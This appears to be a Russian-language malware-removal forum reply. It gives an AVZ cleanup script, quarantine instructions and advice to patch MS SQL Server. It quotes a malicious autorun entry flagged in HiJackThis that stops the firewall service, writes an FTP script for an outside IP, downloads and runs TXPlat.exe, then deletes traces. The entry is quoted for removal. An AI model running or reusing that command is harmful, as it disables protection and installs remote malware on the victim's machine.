Выполните скрипт в AVZ
Код:
begin
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFileF('C:\WINDOWS\system32', '*.exe', false,'', 0, 0, '30.06.2012', '12.08.2012');
QuarantineFileF('C:\WINDOWS\system32', '*.tmp', false,'', 0, 0, '30.06.2012', '12.08.2012');
QuarantineFileF('C:\WINDOWS\system32', '*.bat', false,'', 0, 0, '30.06.2012', '12.08.2012');
QuarantineFileF('C:\WINDOWS', '*.exe', false,'', 0, 0, '30.06.2012', '12.08.2012');
BC_ImportAll;
BC_Activate;
RebootWindows(true);
end.
Компьютер перезагрузится.
Пришлите карантин согласно Приложения 2 правил по красной ссылке Прислать запрошенный карантин вверху темы
Пофиксите в HiJack
Код:
O4 - HKLM\..\Run: [shell] c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 222.186.15.123 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get TXPlat.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&TXPlat.exe&TXPlat.exe&del
Содержимое файла C:\Windows\system32\cmd.txt покажите
И приступайте к установке всех доступных обновлений для MS SQL Server. А если используете не последнюю версию, то сначала установите ее, а потом все обновления